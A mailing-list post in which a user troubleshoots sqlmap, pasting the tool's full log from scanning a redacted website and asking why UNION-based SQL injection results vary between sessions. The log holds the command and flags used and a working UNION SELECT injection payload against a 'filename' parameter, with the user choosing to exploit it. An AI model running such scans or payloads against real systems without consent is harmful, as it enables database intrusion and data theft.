Hi,
Below is the sqlmap command. Next time I ran it, it already says that the
parameter filename is not injectable. However, I always get an info that the
target URL is UNION injectable but the number of columns change every session.
I also used the --technique=U --dbms=mysql --flush-session --level=3 --risk=3
and even the --time-sec=2 but I only get UNION injectable message but nothing
is vulnerable. What seems to be the problem here? Anybody can help me?
C:\Python27\sqlmap>python sqlmap.py -u
"xxxxxxx" --forms --b
atch --beep
sqlmap/1.0-dev (r4221) -
automatic SQL injection and database takeover tool
http://www.sqlmap.org
[!] legal disclaimer: usage of sqlmap for attacking targets
without prior mutual
consent is illegal. It is
the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are
not responsib
le for any misuse or damage caused by this program
[*] starting at 14:39:37
[14:39:37] [INFO] setting file for logging HTTP traffic
[14:39:37] [INFO] testing connection to the target url
[14:39:38] [INFO] searching for forms
[#1] form: [INFO]
GET xxxxxxxxx
do you want to test this form? [Y/n/q]
> Y
Edit GET data [default: xxxxxxxx
do you want to fill blank fields with random values? [Y/n] Y
[14:39:38] [INFO] using
'C:\Python27\sqlmap\output\xxxx\session' as sessi
on file
[14:39:38] [INFO] using
'C:\Python27\sqlmap\output\results-07072011_0239pm.csv'
as results file
[14:39:38] [INFO] testing if the url is stable, wait a few seconds
[14:39:39] [INFO] url is stable
[14:39:39] [INFO] testing if GET parameter 'productid' is dynamic
[14:39:39] [WARNING] GET parameter 'productid' appears to be not
dynamic
[14:39:39] [WARNING] heuristic test shows that GET parameter
'productid' might n
ot be injectable
[14:39:39] [INFO] testing sql injection on GET parameter
'productid'
[14:39:39] [INFO] testing 'AND boolean-based blind - WHERE or
HAVING clause'
[14:39:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE
or HAVING clause
'
[14:39:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or
HAVING clause'
[14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase AND
error-based - WHERE o
r HAVING clause'
[14:39:40] [INFO] testing 'Oracle AND error-based - WHERE or
HAVING clause (XMLT
ype)'
[14:39:40] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked
queries'
[14:39:40] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based
blind'
[14:39:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based
blind'
[14:39:41] [INFO] testing 'Oracle AND time-based blind'
[14:39:41] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10
columns'
[14:39:42] [INFO] testing 'Generic UNION query (NULL) - 1 to 10
columns'
[14:39:42] [WARNING] using unescaped version of the test because
of zero knowled
ge of the back-end DBMS. you can try to explicitly set it using
the --dbms optio
n
[14:39:44] [WARNING] GET parameter 'productid' is not injectable
[14:39:44] [INFO] testing if GET parameter 'name' is dynamic
[14:39:44] [WARNING] GET parameter 'name' appears to be not
dynamic
[14:39:44] [WARNING] heuristic test shows that GET parameter
'name' might not be
injectable
[14:39:44] [INFO] testing sql injection on GET parameter 'name'
[14:39:44] [INFO] testing 'AND boolean-based blind - WHERE or
HAVING clause'
[14:39:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE
or HAVING clause
'
[14:39:45] [INFO] testing 'PostgreSQL AND error-based - WHERE or
HAVING clause'
[14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase AND
error-based - WHERE o
r HAVING clause'
[14:39:45] [INFO] testing 'Oracle AND error-based - WHERE or
HAVING clause (XMLT
ype)'
[14:39:45] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:45] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked
queries'
[14:39:46] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:46] [INFO] testing 'PostgreSQL > 8.1 AND time-based
blind'
[14:39:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based
blind'
[14:39:46] [INFO] testing 'Oracle AND time-based blind'
[14:39:46] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10
columns'
[14:39:47] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10
columns'
[14:39:50] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:51] [WARNING] GET parameter 'name' is not injectable
[14:39:51] [INFO] testing if GET parameter 'filename' is dynamic
[14:39:52] [WARNING] GET parameter 'filename' appears to be not
dynamic
[14:39:52] [WARNING] heuristic test shows that GET parameter
'filename' might no
t be injectable
[14:39:52] [INFO] testing sql injection on GET parameter
'filename'
[14:39:52] [INFO] testing 'AND boolean-based blind - WHERE or
HAVING clause'
[14:39:52] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:53] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE
or HAVING clause
'
[14:39:54] [INFO] testing 'PostgreSQL AND error-based - WHERE or
HAVING clause'
[14:39:54] [INFO] testing 'Microsoft SQL Server/Sybase AND
error-based - WHERE o
r HAVING clause'
[14:39:54] [INFO] testing 'Oracle AND error-based - WHERE or
HAVING clause (XMLT
ype)'
[14:39:55] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:39:55] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[14:39:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked
queries'
[14:39:55] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:55] [WARNING] most probably web server instance hasn't
recovered yet from
previous timed based payload.
if the problem persists please wait for few minut
es and rerun without flag T in --technique option (e.g.
--flush-session --techni
que=BEUS) or try to lower the --time-sec value (e.g. --time-sec=2)
[14:39:56] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:39:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based
blind'
[14:39:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based
blind'
[14:39:56] [INFO] testing 'Oracle AND time-based blind'
[14:39:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10
columns'
[14:39:57] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:39:59] [INFO] testing 'Generic UNION query (NULL) - 1 to 10
columns'
[14:40:00] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:01] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:03] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:04] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:05] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:06] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:07] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:08] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:09] [CRITICAL] unable to connect to the target url or proxy
[14:40:09] [INFO] target url appears to be UNION injectable with
10 columns
[14:40:09] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:10] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:11] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:12] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:13] [CRITICAL] unable to connect to the target url or proxy
[14:40:13] [INFO] GET
parameter 'filename' is 'Generic UNION query (NULL) - 1 to
10 columns' injectable
GET parameter 'filename' is
vulnerable. Do you want to keep testing the others?
[y/N] N
sqlmap identified the following injection points with a total of
414 HTTP(s) req
uests:
---
Place: GET
Parameter: filename
Type: UNION query
Title: Generic UNION query (NULL) - 1 to 10
columns
Payload:
productid=Bbvv&name=ihOH&filename=BVux' UNION ALL SELECT NULL, 'xsD
iekxuxW', NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL-- AND
'Aege'='Aege&cre
ationdate=OnGh&encodingformat=AZfu&productgroup=NdSR&producepriority=FatH&isacti
ve=on&comment=uPni
---
do you want to exploit this SQL injection? [Y/n] Y
[14:40:13] [INFO] testing MySQL
[14:40:13] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:14] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:15] [CRITICAL] unable to connect to the target url or
proxy, sqlmap is go
ing to retry the request
[14:40:16] [ERROR] unable to connect to the target url or proxy,
skipping to the
next form
[14:40:16] [INFO] you can find results of scanning in multiple
targets mode insi
de the CSV file
'C:\Python27\sqlmap\output\results-07072011_0239pm.csv'
[*] shutting down at 14:40:16
------------------------------------------------------------------------------
All of the data generated in your IT infrastructure is seriously valuable.
Why? It contains a definitive record of application performance, security
threats, fraudulent activity, and more. Splunk takes this data and makes
sense of it. IT sense. And common sense.
http://p.sf.net/sfu/splunk-d2d-c2
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
